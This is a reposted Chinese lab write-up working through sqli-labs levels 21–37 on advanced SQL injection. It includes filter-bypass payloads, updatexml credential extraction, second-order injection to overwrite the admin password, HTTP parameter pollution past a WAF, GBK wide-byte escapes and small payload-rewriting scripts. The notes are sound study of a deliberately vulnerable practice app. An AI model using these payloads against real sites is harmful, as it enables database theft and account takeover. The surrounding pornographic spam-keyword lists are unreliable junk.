日韩av黄I国产麻豆传媒I国产91av视频在线观看I日韩一区二区三区在线看I美女国产在线I麻豆视频国产在线观看I成人黄色短片

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 >

[NOTE] sqli-labs Adv Injections

發布時間:2024/4/18 42 豆豆
生活随笔 收集整理的這篇文章主要介紹了 [NOTE] sqli-labs Adv Injections 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

[NOTE] sqli-labs Adv Injections

文章目錄

  • [NOTE] sqli-labs Adv Injections
    • 前言
    • Less-21: Cookie injection - base64 encoded-single quotes and parenthesis
    • Less-22: Cookie injection - base64 encoded-single – double quotes
    • Less-23: GET - Error based - strip comments
    • Less-24: POST - Second Oder Injections *Real treat* - Stored Injections
    • Less-25: GET - Error based - All your OR & AND belong to us - string single quote
    • Less-25a: GET - Blind based - All your OR & AND belong to us – Intiger based
    • Less-26: GET - Error based - All your SPACES and COMMENTS belong to us
    • Less-26a: GET - Blind Based - All your SPACES and COMMENTS belong to us – String-single quotes-Parenthesis
    • Less-27: GET - Error Based - All your UNION & SELECT Belong to us – String – String quote
    • Less-27a: GET - Blind Based - All your UNION & SELECT Belong to us – Double Quotes
    • Less-28: GET - Error Based - All your UNION & SELECT Belong to us – String – Single quote with parenthesis
    • Less-28a: GET - Blind Based - All your UNION & SELECT Belong to us – single quote-parenthesis
    • Less-29: GET - Error based - IMPIDENCE MISMATCH – Having a WAF in front of web application
    • Less-30: GET - BLIND - IMPIDENCE MISMATCH - Having a WAF in front of web application
    • Less-31: GET - BLIND - IMPIDENCE MISMATCH – Having a WAF in front of web application
    • Less-32: GET - Bypass custom filter adding slashes to dangerous chars
    • Less-33: GET - Bypass AddSlashes()
    • Less-34: POST - Bypass AddSlashes()
    • Less-35: GET - Bypass Add Slashes (we dont need them) Interger based
    • Less-36: GET – Bypass MySQL_real_escape_string
    • Less-37: POST – Bypass MySQL_real_escape_string

前言

針對sqli-labs靶場的做題筆記

環境
虛擬機環境
攻擊機:kali|10.10.10.1
靶機:ubuntu|10.10.10.2|Apache+PHP+MySQL

Less-21: Cookie injection - base64 encoded-single quotes and parenthesis

就是Basic Injection里邊的Less-21(重復了?)

Less-22: Cookie injection - base64 encoded-single – double quotes

和Less-21一樣,只不過閉合方式從 ’) 變成了 “
下略

試試sqlmap能不能跑
sqlmap -r cookieInj --level 5 --risk 3 --cookie="uanme=*" --tamper="base64encode"
關鍵是指定要探測注入漏洞的cookie字段(注意格式),以及指定編碼方式(tamper——篡改)

Less-23: GET - Error based - strip comments

strip comments——注釋過濾?應該是做了基本的過濾
看眼源碼:

用preg_replace()對注釋符做了過濾(正則匹配)
過濾方法1:主動閉合——?id=' or 1=1 or '
?id=' union select 1,group_concat(username),group_concat(password) from users where '1'='1
過濾方法2:00截斷——?id=' or 1=1; %00(不知為啥要加個分號)
?id=' union select 1,group_concat(username),group_concat(password) from users; %00

Less-24: POST - Second Oder Injections Real treat - Stored Injections

關于這題的學習資料

看了半天源碼,是有兩個有區別的PHP函數
mysql_real_escape_string
mysql_escape_string

這關簡單模擬了一個系統,注冊、登入、重置密碼、登出到忘記密碼都有
其中除注冊外,其他地方的輸入都使用了mysql_real_escape_string()進行轉義
而注冊的地方使用的是mysql_escape_string()進行轉義

可以上網查一下這兩個函數,其中mysql_escape_string不轉義“%”和“_”

關于這題整體,是二次注入,也叫存儲型注入
大致思路是,先事把含有特殊字符的字符串放到服務器數據庫中
然后再找到服務器提取該字符串并直接拼接到SQL語句中的場景
因為是從數據庫中直接提取字符串而不是由用戶輸入
所以很可能是沒有做任何過濾就直接拼接的
從而繞過一些過濾限制

這題關鍵是重置密碼時,無需用戶輸入自己的用戶名
那么很可能就是系統自己從數據庫中提取并拼接用戶名


做法

先自己注冊一個賬戶:admin'#/password
可以注意到這個用戶名是合法的,并且會被完整顯示出來

登入這個用戶,重置自己的密碼為hacked

然后登出,會發現賬戶admin的密碼被改成了hacked

這是因為后臺修改賬戶密碼的代碼如下:
UPDATE users SET PASSWORD='$pass' WHERE username='$username' and password='$curr_pass'

其中用戶名字段是直接從$_SESSION["username"]中提取的
當拼接上我們自己創建的賬戶時,就會變成:
UPDATE users SET PASSWORD='$pass' WHERE username='admin'#' and password='$curr_pass'
相當于變成了:
UPDATE users SET PASSWORD='$pass' WHERE username='admin'

這樣就達到了修改管理員賬戶密碼的目的

這題難度感覺不白盒,很難做出來

Less-25: GET - Error based - All your OR & AND belong to us - string single quote

一樣的GET參數id
題目是,所有的OR和AND都歸他了
估計是過濾這倆關鍵字

99':報錯
99'%23:沒有報錯
估計是字符型注入

然后payload里面包含and和or,回顯出來都不見了
說明被過濾了

URL編碼不行,concat函數包含字符串的or不行
可能還需要多了解一下編碼繞過這塊,可能有別的可行方法
(編碼繞過方向全錯,我在贛神魔)

這個payload倒不會報語法錯誤,但是說列數不同
?id=' union select (case when (1=1) then 1 else 1 end) %23
即case-when-then-end可用

蚌埠住了,看看源碼,對參數id做了下黑名單過濾:

function blacklist($id) {$id= preg_replace('/or/i',"", $id);$id= preg_replace('/AND/i',"", $id);return $id; }

preg_replace函數:hhhhhh草得去等館長了

preg_replace函數:對目標字符串執行一個正則模式的查找與替換
最關鍵的是,它只會查找并替換一次,只有一次
于是就可以雙寫繞過了
(函數原型好像有一個limit參數指定替換的最大次數?默認是-1無限次?)
(可能是指遍歷替換的次數,不是遞歸替換的次數?)

此外換成||和&&也行,但是后面有些payload還是要雙寫

另外注意的是,別的地方出現了or和and都要雙寫繞過:
?id=' union select 1,group_concat(column_name),3 from infoorrmation_schema.columns where table_schema=database() anandd table_name='users' %23
可以考慮寫個腳本函數自動執行payload的替換

原來雙寫繞過就可以了,一開始還去想什么編碼、case-wen啥的
終極眼高手低,草


一個繞過過濾的思路:
若有過濾,先判斷是一次性過濾還是非一次性過濾

一次性的話:雙寫繞過

非一次性的話:則要考慮變形

  • 大小寫混拼
  • 運算符代替:or->||、and->&&
  • URL編碼繞過:#->%23
  • Hex編碼繞過:~->0x7e
  • 添加注釋:/*or*/

Less-25a: GET - Blind based - All your OR & AND belong to us – Intiger based

題目加個a,估計只是上一題的變式

字符型注入換成數字型
其他地方實際做起來確實和上一題沒啥區別,都是雙寫可繞過

看看源碼,沒啥東西
倒是有一行print_r(mysql_error())被注釋掉了,所以沒有錯誤回顯

Less-26: GET - Error based - All your SPACES and COMMENTS belong to us

看樣子是過濾掉了空格和注釋
結果不是,or和and也被過濾了

看看源碼的過濾函數:

function blacklist($id) {//strip out OR (non case sensitive)$id= preg_replace('/or/i',"", $id);//Strip out AND (non case sensitive)$id= preg_replace('/and/i',"", $id);//strip out /*$id= preg_replace('/[\/\*]/',"", $id);//Strip out --$id= preg_replace('/[--]/',"", $id);//Strip out #$id= preg_replace('/[#]/',"", $id);//Strip out spaces$id= preg_replace('/[\s]/',"", $id);//Strip out slashes$id= preg_replace('/[\/\\\\]/',"", $id);return $id; }

關于過濾注釋的繞過,一開始想著這樣雙拼:/*/**/*/
結果不行,原來過濾的是/*
所以要這樣雙拼://**/**/
說明繞過的姿勢還要放開思路

驗證注入的payload:?id='//**/**/oorr//**/**/'1'='1

寫了個腳本來做敏感字符得自動化替換:

import sysif __name__ == '__main__':for i in range(len(sys.argv)-1):res = sys.argv[i+1]res = res.replace(" ", "/**/")res = res.replace("or", "oorr")res = res.replace("and", "anandd")res = res.replace("/*", "//**")print(res)exit(0)

后面那個注釋符目前找不到很好的繞過方法,好像只能通過閉合的方式通過檢查

但是試了試別的payload,發現會報錯?例如下面這個爆表:
'//***/union//***/select//***/1,group_concat(table_name),3//***/from//***/infoorrmation_schema.tables//***/where//***/table_schema=database()//***/anandd//***/'1'='1

就報了語法錯誤:check the manual that corresponds to your MySQL server version for the right syntax to use near ‘unionselect1,group_concat(table_name),3frominformation_schema.tableswheretable_s’ at line 1

檢查一下發現回顯也正常,只是空格都被抽掉了
(后面檢查可能還真是這里的問題,因為后面測出來是只有用空格分隔的SQL語句如“union select”等才會出現這樣的問題)
那為啥別人可以?
所以估計是union select和后面的limit配合得不是很好?
不會要補習MySQL語法吧…


由于有完整報錯回顯,考慮使用updatexml、extractvalue等函數

改進下腳本:

import sysres = sys.argv[1] res = res.replace(" or ", "||") res = res.replace("or", "oorr") res = res.replace(" ", "/**/") res = res.replace("and", "anandd") res = res.replace("/*", "//**")print(res)

另外空格被過濾,使用圓括號是一個不錯的分隔辦法

爆庫:'||updatexml(1,//**concat(0x7e,//**(select//**database()),//**0x7e),//**1)||'1'='1

爆表:
'||updatexml(1,//***/concat(0x7e,//***/(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=database())),//***/0x7e),//***/1)||'1'='2

爆字段:
'||updatexml(1,//***/concat(0x7e,//***/(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=database())),//***/0x7e),//***/1)||'1'='2

爆數據:
'||updatexml(1,//***/concat(0x7e,//***/(select(group_concat(username))from(users)limit%0B0,1),//***/0x7e),//***/1)||'1'='2

但是到這里問題又來了
由于報錯會限制回顯的字符數,所以需要使用limit 0,1來作偏移
但是這樣的話就免不了又要使用空格或別的分隔符
然后就會被抽走,然后又報語法錯誤:

payload:'||updatexml(1,//***/concat(0x7e,//***/(select(group_concat(username))from(users)limit//***/0,1),//***/0x7e),//***/1)||'1'='2
報錯回顯:check the manual that corresponds to your MySQL server version for the right syntax to use near ‘limit0,1),0x7e),1)||‘1’=‘2’ LIMIT 0,1’ at line 1

上面的‘limit’和‘0’接在一起了,去掉這個limit就沒事


那后面剩下的就上盲注吧
額不對,盲注數據好像也要用到limit?那咋辦啊

我不理解,為什么別人和在數據庫里使用/**/代替空格就行
換到sqli-labs就不行…
不會又是垃圾小皮的鍋吧。。。。

上sqlmap看看
能測出DBMS是MySQL,參數id可以注入,但是后面就測不動了
可能要指定別的參數啥的

Less-26a: GET - Blind Based - All your SPACES and COMMENTS belong to us – String-single quotes-Parenthesis

估計是和上題差不多,有些變形,而且提示了是基于盲注

測了測,發現閉合要加多個)
關閉了錯誤回顯,所以updatexml這類路走不通了

貼個驗證注入存在的payload:')||1=1||('1')=('2

盲注要用到也要limit,那咋整啊

Less-27: GET - Error Based - All your UNION & SELECT Belong to us – String – String quote

看樣子是過濾掉了union和select,估計還有別的

驗證一下:?id=' or 1=1 %23
回顯:check the manual that corresponds to your MySQL server version for the right syntax to use near ‘or1=1’ LIMIT 0,1’ at line 1
看樣子之前過濾的這次也過濾了
得用回之前的腳本來做字段替換

看眼過濾函數:

function blacklist($id) {$id= preg_replace('/[\/\*]/',"", $id);//strip out /*$id= preg_replace('/[--]/',"", $id);//Strip out --.$id= preg_replace('/[#]/',"", $id);//Strip out #.$id= preg_replace('/[ +]/',"", $id);//Strip out spaces.$id= preg_replace('/select/m',"", $id);//Strip out spaces.$id= preg_replace('/[ +]/',"", $id);//Strip out spaces.$id= preg_replace('/union/s',"", $id);//Strip out union$id= preg_replace('/select/s',"", $id);//Strip out select$id= preg_replace('/UNION/s',"", $id);//Strip out UNION$id= preg_replace('/SELECT/s',"", $id);//Strip out SELECT$id= preg_replace('/Union/s',"", $id);//Strip out Union$id= preg_replace('/Select/s',"", $id);//Strip out select return $id; }

觀察一下,發現分隔符只過濾了空格和/*,也就是說制表符%09可用
union和select過濾也不完整,大小寫混拼可用
沒有過濾or和and
注釋符不可用

那比上一題簡單了呀,updatexml注入走起!


payload替換腳本:

import sysres = sys.argv[1] res = res.replace("union", "UnIoN") res = res.replace("select", "SeLeCt") res = res.replace(" ", "%09") res = res.replace("/*", "//**")print(res)

爆庫:
'%09or%09updatexml(1,%09(concat(0x7e,%09(SeLeCt%09database()),%090x7e)),%091)%09or%09'1'='1

爆表:
'%09or%09updatexml(1,%09(concat(0x7e,%09(SeLeCt%09group_concat(table_name)%09from%09information_schema.tables%09where%09table_schema=database()),%090x7e)),%091)%09or%09'1'='2

爆字段:
'%09or%09updatexml(1,%09(concat(0x7e,%09(SeLeCt%09group_concat(column_name)%09from%09information_schema.columns%09where%09table_schema=database()%09and%09table_name='users'),%090x7e)),%091)%09or%09'1'='2

爆數據(limit偏移):
'%09or%09updatexml(1,%09(concat(0x7e,%09(SeLeCt%09group_concat(username)%09from%09users%09limit%090,1),%090x7e)),%091)%09or%09'1'='2
然后發現limit 1,1就沒有任何顯示了????

實際上可以用制表符代替分隔符的話,可以直接union select:
'%09UnIoN%09SeLeCt%091,group_concat(username),group_concat(password)%09from%09users%09where%09'1'='1

union和select的限制也可以直接雙寫繞過

Less-27a: GET - Blind Based - All your UNION & SELECT Belong to us – Double Quotes

和上題差不多,換成雙引號,關閉錯誤回顯

爆數據:
"%09UnIoN%09SeLeCt%091,group_concat(username),group_concat(password)%09from%09users%09where%09"1"="1

Less-28: GET - Error Based - All your UNION & SELECT Belong to us – String – Single quote with parenthesis

首先還是先試試

' or '1'='1這個可以正常回顯
返回提示:Your Input is Filtered with following result: 'or'1'='1
空格被過濾了
然后試了試制表符%09,返回提示:result: ' or '1'='1
說明制表符可用,過濾不完全

union和select又被過濾,但試了試大小寫混拼不行
雙寫,發現返回提示:result: ' ununionion seselectlect 1,2,'3
說明雙寫的內容沒有被過濾,怎么回事??

看眼源碼,發現針對這倆的過濾正則是這樣的:/union\s+select/i
即過濾的是這倆的組合

想到除去union select之外還有一個union all select
可以用這個繞過上面的過濾

另外還發現不僅有單引號,還有一個圓括號也要閉合
于是有如下payload:')%09union%09all%09select%09'1','2',('3

爆庫:')%09union%09all%09select%09'1','2',('3

爆表:
')%09union%09all%09select%09'1',group_concat(table_name),3%09from%09information_schema.tables%09where%09table_schema=database%09and%09'1'=('1

爆字段:
')%09union%09all%09select%09'1',group_concat(column_name),3%09from%09information_schema.columns%09where%09table_schema=database()%09and%09table_name='users'%09and%09'1'=('1

爆數據:
')%09union%09all%09select%09'1',group_concat(username),group_concat(password)%09from%09users%09where%09'1'=('1

Less-28a: GET - Blind Based - All your UNION & SELECT Belong to us – single quote-parenthesis

很卵奇怪,和上一題沒啥區別
看一眼源碼,發現除了對union select的組合過濾之外沒有別的過濾了

Less-29: GET - Error based - IMPIDENCE MISMATCH – Having a WAF in front of web application

“IMPIDENCE MISMATCH”——預防不匹配?
另外題目說有WAF
(This Site Protected by World's Best Firewall,嗯哼?)

隨便試試,發現亂注?' or 1=1 %23有回顯
真就亂注,爆數據:' union select 1,group_concat(username),group_concat(password) from users %23

怎么回事,看看源碼
源碼里面也沒有任何關于WAF的內容啊?


破案了,原來用戶界面是login.php,不是默認的index.php
那就重新來過

發現不管給id傳入什么參數都會報錯,然后302跳到一個hacked.php
顯示說被WAF擋住了

看源碼,發現有很奇怪的地方,既有id1又有id:

$qs = $_SERVER['QUERY_STRING']; $hint=$qs; $id1=java_implimentation($qs); $id=$_GET['id']; // ... whitelist($id1); // ... $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

其中whitelist函數用白名單限制了參數只能為整數

java_implimentation函數如下:

function java_implimentation($query_string) {$q_s = $query_string;$qs_array= explode("&",$q_s);foreach($qs_array as $key => $value) {$val=substr($value,0,2);if($val=="id") {$id_value=substr($value,3,30); return $id_value;echo "<br>";break;}} }

explode函數用于將字符串打散成數組
java_implimentation函數的目的大概在于,捕獲第一個id參數并返回
問題就在于只捕獲第一個id參數,就把它返回給id1
并且后面的白名單檢測,只檢測id1
而拼接在SQL語句里的是從$_GET['id']獲得的id

再結合一波**HPP(HTTP Parameter Pollution,HTTP參數污染)**的知識
大概是請求參數中有兩個參數同名的話
不同Web服務器對其的處理規則不同
從而導致利用點出現

例如PHP/Apache里邊,會把最后一個同名參數作為傳參
http://www.xx.com/?id=1&id=' or '1'='1
有可能檢測到第一個id正常就通過,而傳入服務器的是后面的惡意參數

下面是具體不同Web服務器的處理方式:

Web服務器參數獲取函數獲取到的參數
PHP/Apache$_GET(“par”)Last
JSP/TomcatRequest.getParameter(“par”)First
Perl(CGI)/ApacheParam(“par”)First
Python/ApacheGetvalue(“par”)All(List)
ASP/IISRequest.QueryString(“par”)All(comma-delimited string)

所以根據上述知識,只需要傳入兩個id參數,就可以WAF Bypass了,payload:
?id=1&id=' union select 1,group_concat(username),group_concat(password) from users %23
(前面的過程略)


另外關于這個WAF的體現,整(fu)理(zhi)了一波網上的資料

大概是這么一個雙層服務器架構

服務器端有兩個部分:第一部分為 tomcat 為引擎的 jsp 型服務器,第二部分為 apache 為引擎的 php 服務器,真正提供 web 服務的是 php 服務器。

工作流程為:client 訪問服務器,能直接訪問到 tomcat 服務器,然后 tomcat 服務器再向 apache 服務器請求數據。數據返回路徑則相反。

接下來是參數解析的問題。
問:index.php?id=1&id=2,這時回顯是id=1還是id=2呢?
答:apache (php) 解析最后一個參數,即回顯id=2;tomcat (jsp) 解析第
一個參數,即回顯id=1。

問:index.jsp?id=1&id=2,針對這關的兩層結構,客戶端請求首先過 tomcat,tomcat 解析第一個參數,接下來 tomcat 請求 apache,apache 解析最后一個參數。那么最終返回客戶端的是哪個參數?
答:此處應該還是id=2,因為實際上提供服務的是 apache 服務器,返回的數據也應該是 apache 處理的數據。

而在我們實際應用中,也是有兩層服務器的情況,那為什么要這么做?是因為我們往往在 tomcat 服務器處做數據過濾和處理,功能類似為一個 WAF。

而正因為解析參數的不同,我們此處可以利用該原理繞過 WAF 的檢測。如 payload:index.jsp?id=1&id=0 or 1=1–+,tomcat 只檢查第一個參數id=1,而對第二個參數id=0 or 1=1–+不做檢查,直接傳給了 apache,apache 恰好解析第二個參數,便達到了攻擊的目的。

所以這題模擬的就是上面的Tomcat WAF&Apache Server架構

Less-30: GET - BLIND - IMPIDENCE MISMATCH - Having a WAF in front of web application

承接上題經驗
單id參數會報錯
雙重id前正確后惡意能行:?id=1&id=" or 1=1 %23
測出來是雙引號字符型

直接上最后爆數據的payload:
?id=1&id=" union select 1,group_concat(username),group_concat(password) from users %23

看源碼:

和上題沒啥區別

Less-31: GET - BLIND - IMPIDENCE MISMATCH – Having a WAF in front of web application

承接Less-29題經驗

只是變成了雙引號+圓括號閉合:?id=1&id=") or 1=1 %23

最后爆數據的payload:
?id=1&id=") union select 1,group_concat(username),group_concat(password) from users %23

源碼其余地方和之前一樣

Less-32: GET - Bypass custom filter adding slashes to dangerous chars

打入單引號的時候,發現提示回顯:
Hint: The Query String you input is escaped as : \’
The Query String you input in Hex becomes : 5c27

看上去是被加了反斜杠進行轉義
簡單測試,發現'、"以及\都會被加上反斜杠進行轉義

結合提示會回顯16進制的查詢結果,考慮寬字符注入


下面的內容來自Pikachu靶場練習筆記的寬字節注入內容

主要是利用了GBK系列編碼,將兩個字節當成是一個中文字符的原理

相關配置為:set character_set_client = gbk

一般為引號被加上反斜杠轉義的情況
1' and 1=1 #->1\' and 1=1 #
相當于查詢id為‘1’ and 1=1 #’的信息

但是可以主動加上一個‘%df’
1%df' and 1=1 #->1%df\' and 1=1 #->1%df%5c' and 1=1 #->1輼' and 1=1 #
相當于查詢id為‘1輼’的信息,然后執行and后面的判斷


于是驗證注入的payload:%df' or 1=1 %23

后續略

其中需要用到字符串判斷的地方,比如要table_name='users'
可以使用**concat函數char函數**來進行結合變式
?id=%df' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=concat(char(117),char(115),char(101),char(114),char(115)) %23

Less-33: GET - Bypass AddSlashes()

AddSlashes,添加斜杠
后面跟個圓括號,看起來像個給特殊字符添加斜桿來轉義的函數

果不其然,參數id打入單引號,提示回顯給加上了反斜杠

可以考慮寬字節注入

?id=%df' or 1=1 %23就可以正確回顯了,說明寬字節注入有效
那基本上就和上一題一樣了

看看源碼,主要是使用addslashes函數對傳參進行過濾
這個函數主要是對'、"、\以及NULL字符前邊加上反斜杠

此外源碼里面有一行比較有意思:
mysql_query("SET NAMES gbk");
看來寬字節注入真的與GBK編碼有很大干系

Less-34: POST - Bypass AddSlashes()

變成登錄框,兩個框都會添加反斜杠

遇到問題了,POST怎么做到寬字節注入?


哦,原來原理上是一樣的
驗證payload:username:%df' or 1=1 #/password:1

這里需要了解一下Content-Type: application/x-www-form-urlencoded
這種MIME是form標簽不設置別的encrypt屬性時所默認采用的
它會把表單提交的鍵和值進行url編碼

所以從網頁上提交的payload,再經過url編碼后,會變成這樣:
%25df%27+or+1%3D1+%23
即%被轉碼了,所以提示回顯里面的百分號出現了

所以需要使用bp等代理工具進行抓包改包:

這樣的所發出的payload才有效,才能注入成功


剩下的payload如無說明默認是uname的參數

判斷回顯字段數為2:
%df' or 1=1 order by 2#

查看回顯的字段:
%df' union select 1,2#

下略

其中需要用到字符串判斷的地方,比如要table_name='users'
可以使用**concat函數char函數**來進行結合變式

Less-35: GET - Bypass Add Slashes (we dont need them) Interger based

數字型還要什么雙引號,直接驗證注入:?id=999 or 1=1 %23

爆列:
?id=999 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=concat(char(117),char(115),char(101),char(114),char(115)) %23

下略

Less-36: GET – Bypass MySQL_real_escape_string

怕是要繞過mysql_real_escape_string這個函數

結果可以寬字節繞過


記一下GBK編碼如何防止寬字符注入

先調用mysql_set_charset函數設置連接所使用的字符集為gbk,再調用mysql_real_escape_string函數來過濾用戶輸入
(mysql_set_charset('gbk','$conn'))

也就是說,先不進行轉義,首先以GBK編碼的形式對提交上來的參數進行編碼,然后再進行轉義,(先編碼也意味著反斜杠即5c不會出現,到下一步的轉義引號才出現)

源碼的失誤就在于先轉義再編碼

Less-37: POST – Bypass MySQL_real_escape_string

雖然使用mysql_real_escape_string函數,但是和GBK字符集設置順序有誤

所以可以寬字符繞過

詳見Less-34、Less-36

總結

以上是生活随笔為你收集整理的[NOTE] sqli-labs Adv Injections的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

午夜性色 | 伊人伊成久久人综合网站 | 91精品国产高清自在线观看 | 国产传媒中文字幕 | 涩涩网站在线 | 91亚洲精品国产 | 天天插天天操天天干 | 四虎www.| 天天干天天拍天天操天天拍 | 欧亚日韩精品一区二区在线 | 九九99靖品 | 亚洲欧洲一区二区在线观看 | av网站在线免费观看 | 免费视频xnxx com | 亚洲国产中文字幕在线视频综合 | 成人免费视频网 | 欧美成人黄 | 奇米导航| 国产一区二区在线观看免费 | 少妇bbw撒尿 | 深爱五月激情五月 | 国产精品亚洲视频 | 一区二区三区电影 | 国产精品黄色影片导航在线观看 | 久久亚洲私人国产精品va | 免费下载高清毛片 | 亚洲国产精品资源 | 中文字幕a∨在线乱码免费看 | 免费成人在线观看视频 | 在线高清一区 | 国产视频亚洲视频 | 亚洲va韩国va欧美va精四季 | 免费观看性生活大片 | 免费看黄色小说的网站 | 欧美孕妇视频 | 96av在线| 国产福利在线免费 | 成人黄色大片在线观看 | 超碰在线最新地址 | 91视频免费国产 | 日韩免费中文字幕 | 在线 高清 中文字幕 | 欧美日韩亚洲精品在线 | 天天激情天天干 | 国产在线中文字幕 | 日韩在线视频一区二区三区 | 久久高清国产 | 国产免费资源 | 国产精品日韩欧美一区二区 | 97超碰站| 国产剧情在线一区 | 久久精品免费观看 | 亚洲国产成人在线播放 | 激情图片qvod| 91传媒在线观看 | 亚洲精品字幕在线 | 亚洲精品激情 | 久久高清免费观看 | 丁香婷婷综合五月 | 精品国产一区二区三区日日嗨 | 午夜精品麻豆 | 日韩中文字幕免费在线观看 | 亚洲精品综合一区二区 | 久久免费美女视频 | 久久免费成人 | 欧美综合在线视频 | 久久一区二区三区四区 | 国产高清视频在线免费观看 | 91在线产啪| 日本中文字幕久久 | 国产在线国偷精品产拍免费yy | 精品视频www | 免费看的黄色网 | 99久久综合精品五月天 | 一区二区三区在线视频111 | 婷婷久久网 | 国产色中涩 | www日韩在线| 久操免费视频 | 日女人电影 | 日日夜夜干 | 麻豆视频在线播放 | 欧美日韩一区二区在线 | av观看在线观看 | 操高跟美女 | 日韩av专区 | 中文字幕在线资源 | 久久这里只有精品首页 | 久久精品精品电影网 | 狠狠色丁香婷婷综合久小说久 | 97天堂网 | 91精品在线免费观看视频 | 亚洲高清免费在线 | 欧美日韩国产综合一区二区 | 日日摸日日碰 | 精品国产乱码一区二区三区在线 | 四虎影视成人永久免费观看亚洲欧美 | 国产精品高| 色在线中文字幕 | 在线观看av免费观看 | 日韩欧美一区二区在线 | 中文字幕高清视频 | 不卡av免费在线观看 | 色欧美日韩 | 亚洲色影爱久久精品 | 色资源在线观看 | 国产一区二区中文字幕 | 国产日韩精品一区二区 | 日韩欧美在线免费 | 亚洲性xxxx | 91tv国产成人福利 | 午夜三级大片 | 亚洲成av人电影 | 精品国产成人av | 久草手机视频 | 午夜精品三区 | 美女一区网站 | 久久人人爽人人爽人人片av免费 | 97人人澡人人添人人爽超碰 | 日韩在线国产精品 | 国产精品va视频 | 亚洲国产成人久久综合 | 人人舔人人爱 | 天天添夜夜操 | 久久久久久毛片精品免费不卡 | av一级久久| 中文在线亚洲 | 日韩一二区在线观看 | 久久精品网站视频 | 日色在线视频 | 国产精品手机在线播放 | 欧美日韩在线视频免费 | 欧美日韩免费观看一区二区三区 | 国产一区免费看 | 婷婷色5月 | 黄色免费高清视频 | 91av在线视频免费观看 | 亚洲高清网站 | 国产高清中文字幕 | 国产成人av综合色 | 91传媒激情理伦片 | 久久久精品国产一区二区电影四季 | 亚洲精品视频网址 | 久久99国产综合精品免费 | av片子在线观看 | 国产精品mv | 美女久久精品 | 美女久久一区 | 国产精品九色 | 日本在线视频一区二区三区 | 亚洲最新视频在线 | 日韩免费三区 | 丁香九月婷婷综合 | 欧美国产大片 | 一区二区三区中文字幕在线观看 | 在线观看视频国产 | 国产人成在线观看 | 日韩成人免费观看 | 91精品成人 | 久久国产精品免费观看 | 国产视频一区在线 | 亚洲日本va午夜在线电影 | 中文字幕成人在线观看 | 五月的婷婷 | 国产精品久久久久久一区二区 | 久草在线免费看视频 | 狠狠色丁香久久婷婷综 | 国产精品美女免费看 | 在线精品观看 | 免费看黄在线网站 | 亚洲精品久久久蜜桃直播 | 国产精品成人免费 | 日韩欧美区 | 99精品免费久久久久久久久日本 | 国产精品久久久久久高潮 | 在线观看第一页 | 成人免费 在线播放 | 婷婷播播网 | 深夜精品福利 | 4hu视频 | 婷婷激情av | 麻豆超碰| 欧美日韩久久不卡 | 视频在线一区二区三区 | 国产九九九视频 | 天天色综合三 | av五月婷婷 | 欧美日韩国产一二 | 91色在线观看视频 | 丝袜制服综合网 | 亚洲精品一区中文字幕乱码 | 999电影免费在线观看 | 91av免费在线观看 | 日韩va在线观看 | 天堂成人在线 | 中文字幕亚洲国产 | 天天射天| 精品国产乱码一区二 | www色网站| 激情五月激情综合网 | 深爱开心激情网 | 国语精品免费视频 | 视频精品一区二区三区 | 九九热.com| 日本aaaa级毛片在线看 | 久久久久成人精品 | 久久久久欠精品国产毛片国产毛生 | 69久久99精品久久久久婷婷 | www.伊人网| 免费在线一区二区 | 国产精品久久久久久久久久久久午夜 | 国产粉嫩在线 | 国产精品一区在线 | 精品免费观看 | a级片久久久 | 一级成人免费视频 | www.色五月| 日日干天天干 | 国产婷婷精品 | 免费看一及片 | 精品久久久久免费极品大片 | 99久久成人 | 狠狠狠色丁香综合久久天下网 | 国内视频在线 | 国产成人一二片 | 99热亚洲精品 | 热re99久久精品国产66热 | 午夜在线观看影院 | 久久精品国产精品亚洲 | 欧美色噜噜噜 | 国产精品专区h在线观看 | 亚洲国产美女久久久久 | 五月色丁香 | a午夜在线 | 亚洲视频www | 日日干天天射 | 黄色三级免费观看 | 国产视频日韩 | 成人国产亚洲 | av综合在线观看 | 久久久久久久免费观看 | 欧美日韩在线免费观看视频 | 久久久96 | av中文字幕亚洲 | 亚洲人成在线观看 | 国产一区二区免费在线观看 | 在线小视频国产 | 欧美日韩视频精品 | 久久综合久色欧美综合狠狠 | 国产高清精 | 午夜精品久久久久久99热明星 | 免费在线电影网址大全 | 四虎海外影库www4hu | 久久蜜臀一区二区三区av | 蜜臀久久99精品久久久无需会员 | 99精品在线直播 | 在线观看中文字幕dvd播放 | 狠狠色综合网站久久久久久久 | 999久久国产 | 性色大片在线观看 | 成人影片在线免费观看 | 女人18片毛片90分钟 | 成人黄色免费在线观看 | 日韩精品免费一区二区在线观看 | 久久精品影片 | 日韩精品中文字幕在线不卡尤物 | 手机看片中文字幕 | 91看片在线免费观看 | 亚洲最大av | 91精品国产麻豆国产自产影视 | 国产精品av免费观看 | 黄色a大片 | 日韩视频中文 | 久久视频免费 | 91看成人 | 在线观看 国产 | 色av资源网 | 欧美黑人性爽 | 日韩网站免费观看 | 欧美高清视频不卡网 | 日韩在线视频网 | 亚洲第一区在线观看 | 亚洲国产精品成人va在线观看 | 精品久久久精品 | 西西www4444大胆视频 | 国产精品久久久久久久久久 | 亚洲 欧洲av | 午夜免费电影院 | 在线观看va | 久久综合婷婷综合 | 国产香蕉久久精品综合网 | 色综合久久中文字幕综合网 | 500部大龄熟乱视频使用方法 | 中文字幕国内精品 | 天天操天天射天天 | 在线播放国产精品 | 久久亚洲综合国产精品99麻豆的功能介绍 | 国产黄色一级片在线 | 色视频在线免费观看 | 国产精品黄 | 十八岁免进欧美 | 免费视频一二三区 | 久久精品波多野结衣 | 欧美视频二区 | 欧美亚洲另类在线视频 | 国产精选视频 | 亚洲综合视频网 | 亚州人成在线播放 | 日本xxxx.com | 91精品国产91 | 亚洲自拍偷拍色图 | 91中文视频| 亚洲欧洲av| 国产视频在线观看一区 | 欧美成人高清 | 久久综合加勒比 | 久久毛片网站 | 国产对白av| 婷婷丁香在线 | 中文字幕无吗 | 国产精品网红直播 | 亚洲精品久久久久久久蜜桃 | 精品一区二区三区久久 | 亚洲欧美日韩在线一区二区 | 久青草视频在线观看 | av成年人电影 | 婷婷丁香在线观看 | 探花系列在线 | 视频二区在线 | 